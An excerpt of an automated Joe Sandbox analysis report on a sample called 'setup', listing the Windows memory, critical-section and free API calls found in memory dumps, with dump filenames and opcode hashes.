                                                                                                    • memmove.MSVCRT(?,?,?,00000000,000001B8,0022538C,?,0022538C,?,?,?,002217FF,00000000,00000000,000002B0,?), ref: 0021C3B0
                                                                                                    • memmove.MSVCRT(?,?,?,00000000,000001B8,0022538C,?,0022538C,?,?,?,002217FF,00000000,00000000,000002B0,?), ref: 0021C3D4
                                                                                                    • memmove.MSVCRT(?,?,?,?,?,?,002217FF,00000000,00000000,000002B0,?,00000000), ref: 0021C3EB
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,000001B8,0022538C,?,0022538C), ref: 0021C4DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memmove$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3033661859-0
                                                                                                    • Opcode ID: 58841b17599f082980e85bf957d52859da1ce0780f058f333de7f5cfe29eadd6
                                                                                                    • Instruction ID: 1efb62b1aba4e0f5c3b5eb5cd49257c3ca7f137ecac8eac6741c2315c01f78ab
                                                                                                    • Opcode Fuzzy Hash: 58841b17599f082980e85bf957d52859da1ce0780f058f333de7f5cfe29eadd6
                                                                                                    • Instruction Fuzzy Hash: 55913874A10A06DFCB24CF68C494AAAB7F1FF08314F208A6DD4A6A7691D730F995CF50
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(00000088,?,00000000,00000000,?,?,002155D7,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000), ref: 0021494C
                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,002155D7,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0021496C
                                                                                                    • memmove.MSVCRT(?,?,?,?,?,002155D7,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0021498E
                                                                                                    • LeaveCriticalSection.KERNEL32(00000088), ref: 00214998
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeavememcpymemmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 3567025700-0
                                                                                                    • Opcode ID: fb1f2c65e5fa79c155f9b77513e27449955b9917a09c073506170fb9515ec88a
                                                                                                    • Instruction ID: 2091f7aac749f03318e3ba3e2306fd203fe4f5582637d88ba7deefa2ed26f8e0
                                                                                                    • Opcode Fuzzy Hash: fb1f2c65e5fa79c155f9b77513e27449955b9917a09c073506170fb9515ec88a
                                                                                                    • Instruction Fuzzy Hash: EE415231524706DFCB24EF79D84499BB3E5BF64325F148A2EE49A83640D770E8A0CF15
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0027533E
                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 00275368
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168844106-0
                                                                                                    • Opcode ID: 72dcd5734cfc743b77a60cb2cb0ff259c5f6d2a4c1adf19392ee46d81fdcb4ce
                                                                                                    • Instruction ID: 9a081d3e965b1aa012c7ba3d1d852ca13267ae14e3b10f51235438f9718bec69
                                                                                                    • Opcode Fuzzy Hash: 72dcd5734cfc743b77a60cb2cb0ff259c5f6d2a4c1adf19392ee46d81fdcb4ce
                                                                                                    • Instruction Fuzzy Hash: D83194B16147118FDB10EF29E8C465AB7E0EF84354F5482A9EC198F259E3B0D855CB92
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,002754C5), ref: 00274F90
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002754C5), ref: 00274FAC
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,002754C5), ref: 00274FE9
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,002754C5), ref: 00274FF5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168844106-0
                                                                                                    • Opcode ID: c9ae9c15f03b7275aa2b50e78a0674d73586282b83ff477b8400f95bc96d5bd6
                                                                                                    • Instruction ID: 349cdd4eeb76e69fe7d78761cac98e7a450de26b591d0de49c36fa5137c5ca28
                                                                                                    • Opcode Fuzzy Hash: c9ae9c15f03b7275aa2b50e78a0674d73586282b83ff477b8400f95bc96d5bd6
                                                                                                    • Instruction Fuzzy Hash: 331106B5A093118FC300EF39E98551AFBF0EF89751F02492EE98897311D231E858CB93
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$_wremove
                                                                                                    • String ID:
                                                                                                    • API String ID: 3704146391-0
                                                                                                    • Opcode ID: 968a2ca1267a1335e1e34d1faf5fd38b8429e5626e73923ef765c35faa87e370
                                                                                                    • Instruction ID: 77c180fb34a16ee34a2532fcbc393a8502ccce534bd458255c469ed574a490ad
                                                                                                    • Opcode Fuzzy Hash: 968a2ca1267a1335e1e34d1faf5fd38b8429e5626e73923ef765c35faa87e370
                                                                                                    • Instruction Fuzzy Hash: F0110370524B418AD730EF74C185BAAB7E4AF50700F514C1CA4EA8B692D774F8E1CB42
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 6a8f2e749d9ccbe2553dda811cc2d74b2231cbf7fbb19294df4c9f64758da771
                                                                                                    • Instruction ID: eeb0a867aafccdc3d68ed89cd513c69f0754dabc35c5c5b02f2a75497695c163
                                                                                                    • Opcode Fuzzy Hash: 6a8f2e749d9ccbe2553dda811cc2d74b2231cbf7fbb19294df4c9f64758da771
                                                                                                    • Instruction Fuzzy Hash: 76F0DAB15146009BCB10FF38D4C665ABBE4AF45710F458A9CEC859F34AD334EA61CF91